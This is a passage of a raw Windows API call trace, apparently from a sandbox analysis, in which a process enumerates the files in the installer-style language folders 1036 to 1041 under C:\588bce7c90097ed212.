ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.719] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.719] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.719] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.719] lstrlenW (lpString="eula.rtf") returned 8 [0158.719] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a0bf8 [0158.719] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.719] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.719] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.719] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a0ca0 [0158.720] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.720] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.720] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.720] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.720] FindClose (in: hFindFile=0x678130 | out: hFindFile=0x678130) returned 1 [0158.720] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.720] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0158.720] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.720] lstrlenW (lpString="1036") returned 4 [0158.720] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677cb0 [0158.721] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.721] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.721] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.721] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.721] lstrlenW (lpString="eula.rtf") returned 8 [0158.722] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a0d60 [0158.722] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.722] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.722] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.722] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a0e08 [0158.722] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.722] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.722] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.722] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.722] FindClose (in: hFindFile=0x677cb0 | out: hFindFile=0x677cb0) returned 1 [0158.723] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.723] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1037", cAlternateFileName="")) returned 1 [0158.723] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.723] lstrlenW (lpString="1037") returned 4 [0158.723] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.723] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677eb0 [0158.723] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.723] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.724] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.724] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.724] lstrlenW (lpString="eula.rtf") returned 8 [0158.724] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a0ec8 [0158.724] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.724] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.724] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.724] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a0f70 [0158.725] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.725] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.725] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.725] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.725] FindClose (in: hFindFile=0x677eb0 | out: hFindFile=0x677eb0) returned 1 [0158.725] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.725] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1038", cAlternateFileName="")) returned 1 [0158.725] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.725] lstrlenW (lpString="1038") returned 4 [0158.725] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.725] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.726] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.726] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.726] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.726] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.726] lstrlenW (lpString="eula.rtf") returned 8 [0158.726] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a1030 [0158.726] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.727] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.727] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a10d8 [0158.727] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.727] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.727] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.727] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.727] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.727] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.727] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1040", cAlternateFileName="")) returned 1 [0158.727] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.727] lstrlenW (lpString="1040") returned 4 [0158.727] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677eb0 [0158.728] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.729] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.729] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.729] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.729] lstrlenW (lpString="eula.rtf") returned 8 [0158.729] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a1198 [0158.729] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.729] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.729] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.729] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x6a1240 [0158.729] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.729] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.729] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.730] FindNextFileW (in: hFindFile=0x677eb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.730] FindClose (in: hFindFile=0x677eb0 | out: hFindFile=0x677eb0) returned 1 [0158.730] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.730] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1041", cAlternateFileName="")) returned 1 [0158.730] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.730] lstrlenW (lpString="1041") returned 4 [0158.730] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.730] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677cf0 [0158.731] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.731] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.731] FindNextFileW (in: hFindFile=0x677cf0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.731] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.731] lstrlenW (lpString="eula.rtf") returned 8 [0158.731] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x6a1300 [0158.732] 